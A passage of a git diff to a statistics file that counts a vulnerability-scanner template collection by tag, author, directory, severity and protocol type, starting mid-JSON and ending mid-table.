(@palaziv)","count":1},{"name":"0xtavian","count":1},{"name":"chron0x","count":1},{"name":"s1r1u5_","count":1},{"name":"oscarintherocks","count":1},{"name":"its0x08","count":1},{"name":"mubassirpatel","count":1},{"name":"naglinagli","count":1},{"name":"shifacyclewla","count":1},{"name":"elmahdi","count":1},{"name":"0ut0fb4nd","count":1},{"name":"omarkurt","count":1},{"name":"sshell","count":1},{"name":"co0nan","count":1},{"name":"mah3sec_","count":1},{"name":"revblock","count":1},{"name":"sec_hawk","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"whynotke","count":1},{"name":"@dwisiswant0","count":1},{"name":"defr0ggy","count":1},{"name":"andysvints","count":1},{"name":"0xrod","count":1},{"name":"fmunozs","count":1}],"directory":[{"name":"cves","count":818},{"name":"vulnerabilities","count":312},{"name":"exposed-panels","count":255},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":137},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":57},{"name":"file","count":48},{"name":"workflows","count":37},{"name":"network","count":32},{"name":"iot","count":26},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":732},{"name":"high","count":631},{"name":"medium","count":465},{"name":"critical","count":282},{"name":"low","count":155}],"types":[{"name":"http","count":2155},{"name":"file","count":48},{"name":"network","count":45},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 8dbda1cd09..ab911768d1 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,830 +1,916 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 804 | daffainfo | 280 | cves | 804 | info | 661 | http | 2068 | -| lfi | 325 | pikpikcu | 277 | vulnerabilities | 311 | high | 621 | file | 46 | -| xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 | -| panel | 252 | pdteam | 199 | technologies | 200 | critical | 275 | dns | 12 | -| wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | | -| exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | -| rce | 200 | gy741 | 77 | takeovers | 64 | | | | | -| tech | 191 | pussycat0x | 70 | default-logins | 56 | | | | | -| wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | | -| cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | | -| cve2021 | 139 | 0x_akoko | 43 | network | 34 | | | | | -| joomla | 128 | gaurang | 42 | iot | 25 | | | | | -| cve2010 | 108 | philippedelteil | 27 | miscellaneous | 24 | | | | | -| cve2019 | 97 | ice3man | 26 | dns | 12 | | | | | -| config | 94 | organiccrap | 24 | fuzzing | 10 | | | | | -| cve2018 | 86 | sheikhrishad | 15 | cnvd | 9 | | | | | -| apache | 70 | milo2012 | 14 | headless | 5 | | | | | -| takeover | 68 | pr3r00t | 14 | | | | | | | -| iot | 66 | techbrunchfr | 13 | | | | | | | -| token | 65 | suman_kar | 12 | | | | | | | -| default-login | 64 | cyllective | 11 | | | | | | | -| oob | 57 | r3dg33k | 11 | | | | | | | -| cve2017 | 50 | righettod | 10 | | | | | | | -| unauth | 47 | wdahlenb | 10 | | | | | | | -| file | 46 | random_robbie | 10 | | | | | | | -| network | 43 | nadino | 9 | | | | | | | -| ssrf | 40 | hackergautam | 9 | | | | | | | -| sqli | 38 | melbadry9 | 9 | | | | | | | -| | 37 | iamthefrogy | 8 | | | | | | | -| cve2016 | 36 | aashiq | 8 | | | | | | | -| oracle | 36 | that_juan_ | 8 | | | | | | | -| redirect | 34 | meme-lord | 7 | | | | | | | -| logs | 30 | harshbothra_ | 7 | | | | | | | -| jira | 28 | oppsec | 7 | | | | | | | -| cve2014 | 27 | emadshanab | 7 | | | | | | | -| atlassian | 27 | dogasantos | 7 | | | | | | | -| listing | 27 | dr_set | 7 | | | | | | | -| cve2015 | 26 | randomstr1ng | 7 | | | | | | | -| generic | 23 | techryptic (@tech) | 7 | | | | | | | -| misc | 23 | kophjager007 | 7 | | | | | | | +| cve | 814 | daffainfo | 285 | cves | 818 | info | 732 | http | 2155 | +| lfi | 329 | pikpikcu | 279 | vulnerabilities | 312 | high | 631 | file | 48 | +| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 465 | network | 45 | +| xss | 253 | pdteam | 200 | technologies | 201 | critical | 282 | dns | 12 | +| wordpress | 243 | geeknik | 158 | exposures | 191 | low | 155 | | | +| exposure | 237 | dwisiswant0 | 131 | misconfiguration | 137 | | | | | +| rce | 202 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 193 | pussycat0x | 71 | token-spray | 63 | | | | | +| wp-plugin | 168 | princechaddha | 64 | default-logins | 57 | | | | | +| cve2020 | 164 | zzeitlin | 63 | file | 48 | | | | | +| cve2021 | 147 | madrobot | 61 | workflows | 37 | | | | | +| joomla | 128 | 0x_akoko | 44 | network | 32 | | | | | +| cve2010 | 109 | gaurang | 42 | iot | 26 | | | | | +| cve2019 | 97 | philippedelteil | 27 | miscellaneous | 24 | | | | | +| config | 95 | ice3man | 26 | dns | 12 | | | | | +| cve2018 | 87 | organiccrap | 24 | fuzzing | 10 | | | | | +| apache | 71 | pr3r00t | 15 | cnvd | 9 | | | | | +| takeover | 69 | sheikhrishad | 15 | headless | 5 | | | | | +| iot | 67 | milo2012 | 14 | | | | | | | +| token | 66 | techbrunchfr | 13 | | | | | | | +| default-login | 65 | suman_kar | 12 | | | | | | | +| token-spray | 63 | cyllective | 11 | | | | | | | +| oob | 59 | r3dg33k | 11 | | | | | | | +| cve2017 | 50 | wdahlenb | 10 | | | | | | | +| file | 48 | random_robbie | 10 | | | | | | | +| unauth | 47 | nadino | 10 | | | | | | | +| network | 43 | righettod | 10 | | | | | | | +| ssrf | 40 | melbadry9 | 10 | | | | | | | +| sqli | 40 | hackergautam | 9 | | | | | | | +| | 37 | that_juan_ | 8 | | | | | | | +| cve2016 | 37 | aashiq | 8 | | | | | | | +| oracle | 36 | iamthefrogy | 8 | | | | | | | +| redirect | 35 | dr_set | 7 | | | | | | | +| logs | 30 | kophjager007 | 7 | | | | | | | +| google | 29 | oppsec | 7 | | | | | | | +| jira | 28 | randomstr1ng | 7 | | | | | | | +| cve2014 | 27 | meme-lord | 7 | | | | | | | +| listing | 27 | dogasantos | 7 | | | | | | | +| atlassian | 27 | harshbothra_ | 7 | | | | | | | +| cve2015 | 26 | techryptic (@tech) | 7 | | | | | | | +| generic | 24 | emadshanab | 7 | | | | | | | | auth-bypass | 23 | 0x240x23elu | 7 | | | | | | | -| disclosure | 22 | caspergn | 6 | | | | | | | -| router | 20 | logicalhunter | 6 | | | | | | | -| aem | 19 | pentest_swissky | 6 | | | | | | | -| cisco | 19 | puzzlepeaches | 6 | | | | | | | -| debug | 18 | __fazal | 6 | | | | | | | -| springboot | 18 | rootxharsh | 5 | | | | | | | -| misconfig | 18 | elsfa7110 | 5 | | | | | | | -| sap | 18 | panch0r3d | 5 | | | | | | | -| cve2012 | 17 | yanyun | 5 | | | | | | | -| php | 16 | iamnoooob | 5 | | | | | | | -| cve2011 | 15 | ganofins | 5 | | | | | | | -| login | 14 | lu4nx | 5 | | | | | | | -| weblogic | 14 | joanbono | 5 | | | | | | | -| cve2009 | 14 | e_schultze_ | 4 | | | | | | | -| struts | 14 | github.com/its0x08 | 4 | | | | | | | -| fuzz | 14 | nodauf | 4 | | | | | | | -| adobe | 13 | xelkomy | 4 | | | | | | | -| zoho | 13 | yash anand @yashanand155 | 3 | | | | | | | -| android | 13 | shine | 3 | | | | | | | -| dns | 13 | jarijaas | 3 | | | | | | | -| devops | 13 | _generic_human_ | 3 | | | | | | | -| jenkins | 12 | johnk3r | 3 | | | | | | | -| manageengine | 12 | impramodsargar | 3 | | | | | | | -| aws | 12 | skeltavik | 3 | | | | | | | -| dlink | 12 | unstabl3 | 3 | | | | | | | -| wp-theme | 11 | idealphase | 3 | | | | | | | -| cve2013 | 11 | sushantkamble | 3 | | | | | | | -| xxe | 10 | 0w4ys | 3 | | | | | | | -| dell | 10 | emenalf | 3 | | | | | | | -| ftp | 9 | fyoorer | 3 | | | | | | | -| intrusive | 9 | thomas_from_offensity | 3 | | | | | | | -| magento | 9 | shifacyclewala | 3 | | | | | | | -| vmware | 9 | binaryfigments | 3 | | | | | | | -| ruijie | 8 | mavericknerd | 3 | | | | | | | -| rails | 8 | vsh00t | 3 | | | | | | | -| airflow | 8 | z3bd | 3 | | | | | | | -| scada | 8 | tess | 3 | | | | | | | -| nginx | 8 | f1tz | 3 | | | | | | | -| cve2008 | 8 | incogbyte | 3 | | | | | | | -| cnvd | 8 | dudez | 3 | | | | | | | -| gitlab | 8 | foulenzer | 2 | | | | | | | -| files | 7 | koti2 | 2 | | | | | | | -| microsoft | 7 | 0xelkomy | 2 | | | | | | | -| cms | 7 | mohammedsaneem | 2 | | | | | | | -| netgear | 7 | fabaff | 2 | | | | | | | -| confluence | 7 | gal nagli | 2 | | | | | | | -| google | 7 | afaq | 2 | | | | | | | -| coldfusion | 7 | vavkamil | 2 | | | | | | | -| kubernetes | 7 | kiblyn11 | 2 | | | | | | | -| ibm | 7 | huowuzhao | 2 | | | | | | | -| backup | 7 | dheerajmadhukar | 2 | | | | | | | -| solr | 6 | hetroublemakr | 2 | | | | | | | -| laravel | 6 | alifathi-h1 | 2 | | | | | | | -| jetty | 6 | 0xprial | 2 | | | | | | | -| docker | 6 | convisoappsec | 2 | | | | | | | -| rconfig | 6 | zomsop82 | 2 | | | | | | | -| citrix | 6 | w4cky_ | 2 | | | | | | | -| api | 6 | gevakun | 2 | | | | | | | -| hp | 6 | cocxanh | 2 | | | | | | | -| camera | 6 | arcc | 2 | | | | | | | -| django | 6 | joeldeleep | 2 | | | | | | | -| fileupload | 5 | udit_thakkur | 2 | | | | | | | -| headless | 5 | pxmme1337 | 2 | | | | | | | -| dedecms | 5 | 0xrudra | 2 | | | | | | | -| nodejs | 5 | bp0lr | 2 | | | | | | | -| circarlife | 5 | whoever | 2 | | | | | | | -| printer | 5 | amsda | 2 | | | | | | | -| iis | 5 | 0xsmiley | 2 | | | | | | | +| misc | 23 | pentest_swissky | 6 | | | | | | | +| disclosure | 23 | __fazal | 6 | | | | | | | +| cisco | 22 | logicalhunter | 6 | | | | | | | +| router | 21 | caspergn | 6 | | | | | | | +| misconfig | 19 | puzzlepeaches | 6 | | | | | | | +| aem | 19 | lu4nx | 5 | | | | | | | +| debug | 18 | joanbono | 5 | | | | | | | +| springboot | 18 | ganofins | 5 | | | | | | | +| cve2012 | 18 | elsfa7110 | 5 | | | | | | | +| sap | 18 | johnk3r | 5 | | | | | | | +| php | 16 | rootxharsh | 5 | | | | | | | +| cve2011 | 15 | xelkomy | 5 | | | | | | | +| cve2009 | 14 | iamnoooob | 5 | | | | | | | +| struts | 14 | panch0r3d | 5 | | | | | | | +| fuzz | 14 | yanyun | 5 | | | | | | | +| aws | 14 | github.com/its0x08 | 4 | | | | | | | +| login | 14 | nodauf | 4 | | | | | | | +| weblogic | 14 | e_schultze_ | 4 | | | | | | | +| zoho | 13 | skeltavik | 3 | | | | | | | +| dns | 13 | idealphase | 3 | | | | | | | +| devops | 13 | fyoorer | 3 | | | | | | | +| adobe | 13 | z3bd | 3 | | | | | | | +| android | 13 | yash anand @yashanand155 | 3 | | | | | | | +| jenkins | 12 | binaryfigments | 3 | | | | | | | +| manageengine | 12 | mavericknerd | 3 | | | | | | | +| dlink | 12 | dudez | 3 | | | | | | | +| cve2013 | 11 | shine | 3 | | | | | | | +| wp-theme | 11 | f1tz | 3 | | | | | | | +| dell | 10 | _generic_human_ | 3 | | | | | | | +| intrusive | 10 | impramodsargar | 3 | | | | | | | +| xxe | 10 | incogbyte | 3 | | | | | | | +| vmware | 9 | sullo | 3 | | | | | | | +| ftp | 9 | jarijaas | 3 | | | | | | | +| magento | 9 | vsh00t | 3 | | | | | | | +| rails | 8 | sushantkamble | 3 | | | | | | | +| ibm | 8 | thomas_from_offensity | 3 | | | | | | | +| gitlab | 8 | 0w4ys | 3 | | | | | | | +| cnvd | 8 | tess | 3 | | | | | | | +| ruijie | 8 | unstabl3 | 3 | | | | | | | +| nginx | 8 | shifacyclewala | 3 | | | | | | | +| airflow | 8 | emenalf | 3 | | | | | | | +| microsoft | 8 | amsda | 2 | | | | | | | +| backup | 8 | udit_thakkur | 2 | | | | | | | +| cve2008 | 8 | ree4pwn | 2 | | | | | | | +| scada | 8 | randomrobbie | 2 | | | | | | | +| files | 7 | w4cky_ | 2 | | | | | | | +| cms | 7 | 0xsapra | 2 | | | | | | | +| coldfusion | 7 | whoever | 2 | | | | | | | +| netgear | 7 | davidmckennirey | 2 | | | | | | | +| hp | 7 | fabaff | 2 | | | | | | | +| confluence | 7 | 0xsmiley | 2 | | | | | | | +| kubernetes | 7 | r12w4n | 2 | | | | | | | +| rconfig | 6 | kiblyn11 | 2 | | | | | | | +| jetty | 6 | convisoappsec | 2 | | | | | | | +| api | 6 | gal nagli | 2 | | | | | | | +| fileupload | 6 | bernardofsr | 2 | | | | | | | +| nodejs | 6 | swissky | 2 | | | | | | | +| laravel | 6 | x1m_martijn | 2 | | | | | | | +| camera | 6 | cocxanh | 2 | | | | | | | +| solr | 6 | bsysop | 2 | | | | | | | +| docker | 6 | hetroublemakr | 2 | | | | | | | +| citrix | 6 | 0xprial | 2 | | | | | | | +| django | 6 | vavkamil | 2 | | | | | | | +| circarlife | 5 | huowuzhao | 2 | | | | | | | +| tomcat | 5 | foulenzer | 2 | | | | | | | +| dedecms | 5 | pxmme1337 | 2 | | | | | | | +| jolokia | 5 | me9187 | 2 | | | | | | | | drupal | 5 | g4l1t0 | 2 | | | | | | | -| ssti | 5 | randomrobbie | 2 | | | | | | | -| lucee | 5 | 0xsapra | 2 | | | | | | | -| phpmyadmin | 5 | random-robbie | 2 | | | | | | | -| deserialization | 5 | socketz | 2 | | | | | | | -| jolokia | 5 | bing0o | 2 | | | | | | | -| tomcat | 5 | r3naissance | 2 | | | | | | | -| java | 5 | johnjhacking | 2 | | | | | | | -| windows | 5 | manas_harsh | 2 | | | | | | | -| webserver | 4 | ehsahil | 2 | | | | | | | -| thinkphp | 4 | ree4pwn | 2 | | | | | | | -| zimbra | 4 | swissky | 2 | | | | | | | -| symfony | 4 | moritz nentwig | 2 | | | | | | | -| rfi | 4 | nkxxkn | 2 | | | | | | | -| artifactory | 4 | 0xcrypto | 2 | | | | | | | -| hongdian | 4 | bernardofsr | 2 | | | | | | | -| git | 4 | hahwul | 2 | | | | | | | -| exchange | 4 | bsysop | 2 | | | | | | | -| thinkcmf | 4 | parth | 2 | | | | | | | -| buffalo | 4 | lotusdll | 2 | | | | | | | -| vpn | 4 | davidmckennirey | 2 | | | | | | | -| wso2 | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| glpi | 4 | x1m_martijn | 2 | | | | | | | -| grafana | 4 | 0h1in9e | 1 | | | | | | | -| resin | 4 | 0ut0fb4nd | 1 | | | | | | | -| strapi | 4 | ahmed sherif | 1 | | | | | | | -| proxy | 4 | philippdelteil | 1 | | | | | | | -| elastic | 4 | geraldino2 | 1 | | | | | | | -| crlf | 4 | sullo | 1 | | | | | | | -| traversal | 4 | _darrenmartyn | 1 | | | | | | | -| samsung | 4 | me9187 | 1 | | | | | | | -| solarwinds | 4 | push4d | 1 | | | | | | | -| zabbix | 4 | hakluke | 1 | | | | | | | -| symantec | 4 | sicksec | 1 | | | | | | | -| magmi | 4 | rojanrijal | 1 | | | | | | | -| asp | 4 | un-fmunozs | 1 | | | | | | | -| fatpipe | 4 | willd96 | 1 | | | | | | | -| moodle | 4 | ohlinge | 1 | | | | | | | -| firmware | 4 | noamrathaus | 1 | | | | | | | -| npm | 3 | bjhulst | 1 | | | | | | | -| fanruan | 3 | knassar702 | 1 | | | | | | | -| itop | 3 | nytr0gen | 1 | | | | | | | -| zhiyuan | 3 | kurohost | 1 | | | | | | | -| httpd | 3 | remonsec | 1 | | | | | | | -| r-seenet | 3 | furkansenan | 1 | | | | | | | -| linkerd | 3 | 0xtavian | 1 | | | | | | | -| lfr | 3 | thevillagehacker | 1 | | | | | | | -| openssh | 3 | wabafet | 1 | | | | | | | -| nexus | 3 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | andré monteiro | | | | | | | | -| | | @am0nt31r0 | | | | | | | | +| crlf | 5 | r3naissance | 2 | | | | | | | +| printer | 5 | 0xrudra | 2 | | | | | | | +| phpmyadmin | 5 | ehsahil | 2 | | | | | | | +| ssti | 5 | zomsop82 | 2 | | | | | | | +| deserialization | 5 | gevakun | 2 | | | | | | | +| headless | 5 | nkxxkn | 2 | | | | | | | +| lucee | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| java | 5 | socketz | 2 | | | | | | | +| windows | 5 | johnjhacking | 2 | | | | | | | +| iis | 5 | bing0o | 2 | | | | | | | +| strapi | 4 | manas_harsh | 2 | | | | | | | +| amazon | 4 | parth | 2 | | | | | | | +| symantec | 4 | lotusdll | 2 | | | | | | | +| thinkphp | 4 | afaq | 2 | | | | | | | +| grafana | 4 | hahwul | 2 | | | | | | | +| git | 4 | arcc | 2 | | | | | | | +| samsung | 4 | joeldeleep | 2 | | | | | | | +| hongdian | 4 | 0xcrypto | 2 | | | | | | | +| rfi | 4 | random-robbie | 2 | | | | | | | +| wso2 | 4 | bp0lr | 2 | | | | | | | +| firebase | 4 | mohammedsaneem | 2 | | | | | | | +| npm | 4 | dheerajmadhukar | 2 | | | | | | | +| slack | 4 | 0xelkomy | 2 | | | | | | | +| artifactory | 4 | koti2 | 2 | | | | | | | +| thinkcmf | 4 | alifathi-h1 | 2 | | | | | | | +| moodle | 4 | moritz nentwig | 2 | | | | | | | +| traversal | 4 | tirtha_mandal | 1 | | | | | | | +| solarwinds | 4 | soyelmago | 1 | | | | | | | +| glpi | 4 | divya_mudgal | 1 | | | | | | | +| symfony | 4 | revblock | 1 | | | | | | | +| zimbra | 4 | naglinagli | 1 | | | | | | | +| webserver | 4 | izn0u | 1 | | | | | | | +| elastic | 4 | hakluke | 1 | | | | | | | +| asp | 4 | zandros0 | 1 | | | | | | | +| proxy | 4 | thezakman | 1 | | | | | | | +| vpn | 4 | ahmetpergamum | 1 | | | | | | | +| fatpipe | 4 | dawid-czarnecki | 1 | | | | | | | +| firmware | 4 | d0rkerdevil | 1 | | | | | | | +| resin | 4 | forgedhallpass | 1 | | | | | | | +| magmi | 4 | luskabol | 1 | | | | | | | +| zabbix | 4 | ohlinge | 1 | | | | | | | +| buffalo | 4 | jteles | 1 | | | | | | | +| exchange | 4 | udyz | 1 | | | | | | | +| maps | 4 | furkansenan | 1 | | | | | | | | targa | 3 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| prometheus | 3 | yashanand155 | 1 | | | | | | | -| smtp | 3 | patralos | 1 | | | | | | | -| injection | 3 | th3.d1p4k | 1 | | | | | | | -| slack | 3 | sy3omda | 1 | | | | | | | -| cacti | 3 | adrianmf | 1 | | | | | | | -| oa | 3 | manuelbua | 1 | | | | | | | -| druid | 3 | luskabol | 1 | | | | | | | -| ebs | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| kafka | 3 | mubassirpatel | 1 | | | | | | | -| hoteldruid | 3 | _harleo | 1 | | | | | | | -| log | 3 | shifacyclewla | 1 | | | | | | | -| tikiwiki | 3 | its0x08 | 1 | | | | | | | -| firebase | 3 | brabbit10 | 1 | | | | | | | -| backups | 3 | ringo | 1 | | | | | | | -| caucho | 3 | fopina | 1 | | | | | | | -| springcloud | 3 | dawid-czarnecki | 1 | | | | | | | -| mail | 3 | sickwell | 1 | | | | | | | -| cve2007 | 3 | @dwisiswant0 | 1 | | | | | | | -| jellyfin | 3 | thezakman | 1 | | | | | | | -| opensis | 3 | vzamanillo | 1 | | | | | | | -| fpd | 3 | undefl0w | 1 | | | | | | | -| nosqli | 3 | tim_koopmans | 1 | | | | | | | -| bitrix | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| microstrategy | 3 | raesene | 1 | | | | | | | -| kevinlab | 3 | elder tao | 1 | | | | | | | -| amazon | 3 | xstp | 1 | | | | | | | -| nacos | 3 | alperenkesk | 1 | | | | | | | -| openam | 3 | j33n1k4 | 1 | | | | | | | -| mongodb | 3 | elmahdi | 1 | | | | | | | -| ofbiz | 3 | chron0x | 1 | | | | | | | -| telerik | 3 | fmunozs | 1 | | | | | | | -| bigip | 3 | s1r1u5_ | 1 | | | | | | | -| jeesns | 3 | b0yd | 1 | | | | | | | -| vbulletin | 3 | @github.com/defr0ggy | 1 | | | | | | | -| terramaster | 3 | streetofhackerr007 | 1 | | | | | | | -| backdoor | 3 | whynotke | 1 | | | | | | | -| azure | 3 | streetofhackerr007 (rohit | 1 | | | | | | | +| nexus | 3 | _harleo | 1 | | | | | | | +| openam | 3 | raesene | 1 | | | | | | | +| search | 3 | ringo | 1 | | | | | | | +| oa | 3 | xstp | 1 | | | | | | | +| ebs | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| kevinlab | 3 | kre80r | 1 | | | | | | | +| httpd | 3 | juicypotato1 | 1 | | | | | | | +| hoteldruid | 3 | clarkvoss | 1 | | | | | | | +| springcloud | 3 | noamrathaus | 1 | | | | | | | +| github | 3 | kba@sogeti_esec | 1 | | | | | | | +| jellyfin | 3 | mah3sec_ | 1 | | | | | | | +| cve2007 | 3 | vzamanillo | 1 | | | | | | | +| kafka | 3 | mesaglio | 1 | | | | | | | +| ofbiz | 3 | willd96 | 1 | | | | | | | +| ssh | 3 | s1r1u5_ | 1 | | | | | | | +| lfr | 3 | tim_koopmans | 1 | | | | | | | +| opensis | 3 | streetofhackerr007 | 1 | | | | | | | +| vbulletin | 3 | whynotke | 1 | | | | | | | +| bigip | 3 | patralos | 1 | | | | | | | +| terramaster | 3 | _darrenmartyn | 1 | | | | | | | +| openssh | 3 | ldionmarcil | 1 | | | | | | | +| linkerd | 3 | deena | 1 | | | | | | | +| caucho | 3 | thebinitghimire | 1 | | | | | | | +| itop | 3 | streetofhackerr007 (rohit | 1 | | | | | | | | | | soni) | | | | | | | | -| kibana | 3 | shelld3v | 1 | | | | | | | -| ssh | 3 | co0nan | 1 | | | | | | | -| dolibarr | 2 | akshansh | 1 | | | | | | | -| waf | 2 | 52971 | 1 | | | | | | | -| seeyon | 2 | ooooooo_q | 1 | | | | | | | -| flir | 2 | alex | 1 | | | | | | | -| idrac | 2 | andirrahmani1 | 1 | | | | | | | -| vrealize | 2 | gboddin | 1 | | | | | | | -| cve2005 | 2 | mhdsamx | 1 | | | | | | | -| natshell | 2 | ipanda | 1 | | | | | | | -| aviatrix | 2 | micha3lb3n | 1 | | | | | | | -| paloalto | 2 | zandros0 | 1 | | | | | | | -| hashicorp | 2 | qlkwej | 1 | | | | | | | -| guacamole | 2 | mesaglio | 1 | | | | | | | -| xxljob | 2 | luci | 1 | | | | | | | -| jeedom | 2 | pudsec | 1 | | | | | | | -| nextcloud | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| hpe | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| chiyu | 2 | apt-mirror | 1 | | | | | | | -| couchdb | 2 | shreyapohekar | 1 | | | | | | | -| payara | 2 | taielab | 1 | | | | | | | -| status | 2 | makyotox | 1 | | | | | | | -| cache | 2 | aceseven (digisec360) | 1 | | | | | | | -| openvpn | 2 | schniggie | 1 | | | | | | | -| phpcollab | 2 | pratik khalane | 1 | | | | | | | -| netis | 2 | flag007 | 1 | | | | | | | -| rstudio | 2 | mass0ma | 1 | | | | | | | -| shellshock | 2 | yashgoti | 1 | | | | | | | -| showdoc | 2 | sec_hawk | 1 | | | | | | | -| globalprotect | 2 | ilovebinbash | 1 | | | | | | | -| huawei | 2 | revblock | 1 | | | | | | | -| rockmongo | 2 | b4uh0lz | 1 | | | | | | | -| middleware | 2 | 0xrod | 1 | | | | | | | -| akkadian | 2 | yavolo | 1 | | | | | | | -| axis2 | 2 | pdp | 1 | | | | | | | -| yapi | 2 | juicypotato1 | 1 | | | | | | | -| minio | 2 | ahmetpergamum | 1 | | | | | | | -| kentico | 2 | intx0x80 | 1 | | | | | | | -| geowebserver | 2 | bolli95 | 1 | | | | | | | -| ilo | 2 | daviey | 1 | | | | | | | -| commax | 2 | blckraven | 1 | | | | | | | -| liferay | 2 | rodnt | 1 | | | | | | | -| totemomail | 2 | kba@sogeti_esec | 1 | | | | | | | -| github | 2 | divya_mudgal | 1 | | | | | | | -| favicon | 2 | andysvints | 1 | | | | | | | -| bypass | 2 | toufik airane | 1 | | | | | | | -| saltstack | 2 | petruknisme | 1 | | | | | | | -| aruba | 2 | affix | 1 | | | | | | | -| getsimple | 2 | omarkurt | 1 | | | | | | | -| activemq | 2 | elouhi | 1 | | | | | | | -| chamilo | 2 | becivells | 1 | | | | | | | -| hasura | 2 | infosecsanyam | 1 | | | | | | | -| jboss | 2 | evolutionsec | 1 | | | | | | | -| keycloak | 2 | deena | 1 | | | | | | | -| bruteforce | 2 | mah3sec_ | 1 | | | | | | | -| trixbox | 2 | cookiehanhoan | 1 | | | | | | | -| pega | 2 | _c0wb0y_ | 1 | | | | | | | -| mcafee | 2 | hanlaomo | 1 | | | | | | | -| storage | 2 | jeya seelan | 1 | | | | | | | -| sitecore | 2 | rotemreiss | 1 | | | | | | | -| prtg | 2 | bad5ect0r | 1 | | | | | | | -| fortios | 2 | soyelmago | 1 | | | | | | | -| frp | 2 | d0rkerdevil | 1 | | | | | | | -| sonicwall | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| bucket | 2 | retr0 | 1 | | | | | | | -| db | 2 | jteles | 1 | | | | | | | -| ucmdb | 2 | berkdusunur | 1 | | | | | | | -| spark | 2 | iampritam | 1 | | | | | | | -| jsf | 2 | regala_ | 1 | | | | | | | -| ecoa | 2 | absshax | 1 | | | | | | | -| chyrp | 2 | x6263 | 1 | | | | | | | -| glassfish | 2 | udyz | 1 | | | | | | | -| harbor | 2 | b0rn2r00t | 1 | | | | | | | -| openfire | 2 | alph4byt3 | 1 | | | | | | | -| kong | 2 | aresx | 1 | | | | | | | -| nextjs | 2 | ratnadip gajbhiye | 1 | | | | | | | -| vcenter | 2 | izn0u | 1 | | | | | | | -| linux | 2 | sshell | 1 | | | | | | | -| adminer | 2 | forgedhallpass | 1 | | | | | | | -| plesk | 2 | nerrorsec | 1 | | | | | | | -| yii | 2 | kabirsuda | 1 | | | | | | | -| dos | 2 | exploitation | 1 | | | | | | | -| maian | 2 | 0xteles | 1 | | | | | | | -| sharepoint | 2 | oscarintherocks | 1 | | | | | | | -| sonarqube | 2 | akash.c | 1 | | | | | | | -| grav | 2 | zhenwarx | 1 | | | | | | | -| leak | 2 | kareemse1im | 1 | | | | | | | -| akamai | 2 | smaranchand | 1 | | | | | | | -| prestashop | 2 | kre80r | 1 | | | | | | | -| wuzhicms | 2 | notsoevilweasel | 1 | | | | | | | -| webcam | 2 | naglinagli | 1 | | | | | | | -| ecology | 2 | tirtha_mandal | 1 | | | | | | | -| upload | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| enumeration | 2 | ajaysenr | 1 | | | | | | | -| horde | 2 | c3l3si4n | 1 | | | | | | | -| qcubed | 2 | ldionmarcil | 1 | | | | | | | -| mida | 2 | borna nematzadeh | 1 | | | | | | | -| wordfence | 2 | defr0ggy | 1 | | | | | | | -| smb | 2 | | | | | | | | | -| netsweeper | 2 | | | | | | | | | -| service | 2 | | | | | | | | | -| node | 2 | | | | | | | | | -| tidb | 2 | | | | | | | | | +| cacti | 3 | blckraven | 1 | | | | | | | +| cves | 3 | nytr0gen | 1 | | | | | | | +| prometheus | 3 | elmahdi | 1 | | | | | | | +| log | 3 | pudsec | 1 | | | | | | | +| nosqli | 3 | cookiehanhoan | 1 | | | | | | | +| tikiwiki | 3 | _c0wb0y_ | 1 | | | | | | | +| fanruan | 3 | apt-mirror | 1 | | | | | | | +| jeesns | 3 | taielab | 1 | | | | | | | +| bitrix | 3 | affix | 1 | | | | | | | +| kibana | 3 | th3.d1p4k | 1 | | | | | | | +| smtp | 3 | sy3omda | 1 | | | | | | | +| zhiyuan | 3 | ratnadip gajbhiye | 1 | | | | | | | +| r-seenet | 3 | co0nan | 1 | | | | | | | +| mail | 3 | kareemse1im | 1 | | | | | | | +| nacos | 3 | hanlaomo | 1 | | | | | | | +| backdoor | 3 | rodnt | 1 | | | | | | | +| injection | 3 | sickwell | 1 | | | | | | | +| node | 3 | j33n1k4 | 1 | | | | | | | +| fpd | 3 | mubassirpatel | 1 | | | | | | | +| druid | 3 | bolli95 | 1 | | | | | | | +| azure | 3 | remonsec | 1 | | | | | | | +| mongodb | 3 | ajaysenr | 1 | | | | | | | +| microstrategy | 3 | absshax | 1 | | | | | | | +| telerik | 3 | alex | 1 | | | | | | | +| rstudio | 2 | sec_hawk | 1 | | | | | | | +| spark | 2 | berkdusunur | 1 | | | | | | | +| backups | 2 | c3l3si4n | 1 | | | | | | | +| ucmdb | 2 | ahmed sherif | 1 | | | | | | | +| hostheader-injection | 2 | petruknisme | 1 | | | | | | | +| aruba | 2 | manuelbua | 1 | | | | | | | +| adminer | 2 | notsoevilweasel | 1 | | | | | | | +| hasura | 2 | yashgoti | 1 | | | | | | | +| pega | 2 | retr0 | 1 | | | | | | | +| vcenter | 2 | knassar702 | 1 | | | | | | | +| aviatrix | 2 | kishore krishna (sillydaddy) | 1 | | | | | | 